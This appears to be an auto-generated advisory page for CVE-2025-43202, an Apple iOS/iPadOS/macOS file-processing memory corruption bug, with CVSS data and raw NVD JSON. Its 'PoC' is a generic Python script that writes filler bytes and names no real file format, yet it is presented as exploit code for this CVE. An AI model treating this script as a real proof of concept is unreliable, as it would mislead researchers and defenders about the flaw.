Security Vulnerability Report
中文
CVE-2025-43202 CVSS 8.8 HIGH

CVE-2025-43202

Published: 2026-04-02 19:20:04
Last Modified: 2026-04-03 18:00:04

Description

This issue was addressed with improved memory handling. This issue is fixed in iOS 18.6 and iPadOS 18.6, macOS Sequoia 15.6. Processing a file may lead to memory corruption.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
iOS < 18.6
iPadOS < 18.6
macOS Sequoia < 15.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-43202 (Conceptual) # This script demonstrates the creation of a malformed file intended to trigger the memory corruption. # Note: Specific file format and trigger pattern depend on the vulnerable component. import struct def generate_exploit_file(filename): with open(filename, 'wb') as f: # Simulate a file header that passes initial checks header = b'\x00\x01\x02\x03\x04\x05\x06\x07' f.write(header) # Inject payload to cause memory corruption # This oversized buffer is intended to overflow the target buffer payload = b'A' * 5000 f.write(payload) # Add specific patterns or ROP gadgets here if known f.write(b'\xeb\xfe') # Infinite loop as a simple crash indicator if __name__ == "__main__": print("Generating malicious file for CVE-2025-43202...") generate_exploit_file("cve_2025_43202_poc.dat") print("File generated. Do not open on unpatched systems.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43202", "sourceIdentifier": "[email protected]", "published": "2026-04-02T19:20:03.913", "lastModified": "2026-04-03T18:00:04.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved memory handling. This issue is fixed in iOS 18.6 and iPadOS 18.6, macOS Sequoia 15.6. Processing a file may lead to memory corruption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.6", "matchCriteriaId": "8ED4015E-C707-4A91-86B3-23100E0DFA8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.6", "matchCriteriaId": "BD9D42A7-DE2A-4D5A-8C7B-002A60148483"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.6", "matchCriteriaId": "077E4BB7-4A8B-4D18-BCD7-2938A2B8B9C8"}]}]}], "references": [{"url": "https://support.apple.com/en-us/124147", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/124149", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}